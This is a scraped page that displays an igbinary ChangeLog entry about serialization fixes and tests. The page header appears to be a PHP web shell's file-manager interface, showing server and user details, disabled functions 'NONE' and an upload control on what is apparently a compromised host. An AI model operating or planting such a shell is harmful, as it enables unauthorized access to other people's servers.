HEX
Server: Apache/2.4.41 (Amazon) OpenSSL/1.0.2k-fips PHP/5.6.40
System: Linux ip-172-31-40-18 4.14.146-93.123.amzn1.x86_64 #1 SMP Tue Sep 24 00:45:23 UTC 2019 x86_64
User: apache (48)
PHP: 5.6.40
Disabled: NONE
Upload Files
File: //usr/share/pear/doc/igbinary/ChangeLog
2008-06-29	Oleg Grenrus	<oleg.grenrus@dynamoid.com>
	* config.m4: fixed CFLAGS
	* igbinary.c: do not init object & string hashes if serializing scalars.
	unserialize_callback_func support.
	igbinary_serialize and igbinary_unserialize for the external use.
	* intbinary.h: header for external use
	* tests/022.phpt: unserialize_callback_func test
	* tests/023.phpt: resource serializes to null test
	* tests/002.phpt tests/003.phpt tests/004.phpt tests/005.phpt tests/006.phpt: == -> ===
	* tests/015b.phpt: pointed out http://bugs.net/bug.php?id=45406